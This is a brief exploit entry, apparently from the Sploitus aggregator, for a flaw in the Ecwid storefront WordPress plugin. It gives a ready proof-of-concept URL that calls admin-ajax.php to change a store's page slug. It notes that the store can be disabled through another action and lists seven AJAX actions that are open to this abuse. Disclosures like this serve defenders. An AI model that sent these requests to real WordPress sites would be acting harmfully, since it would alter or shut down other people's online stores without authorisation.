Share 
## https://sploitus.com/exploit?id=WPEX-ID:D4CF799E-2571-4B96-A303-78DCAFBFCF40
http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=ecwid_storefront_set_page_slug&slug=hehehehe

Besides, you can disable the store via the ecwid_storefront_set_status action.

The list of affected AJAX actions include:

- ecwid_storefront_set_status
- ecwid_storefront_set_store_on_front
- ecwid_storefront_set_display_cart_icon
- ecwid_storefront_set_page_slug
- ecwid_storefront_set_mainpage
- ecwid_storefront_create_page
- ecwid-save-spw-params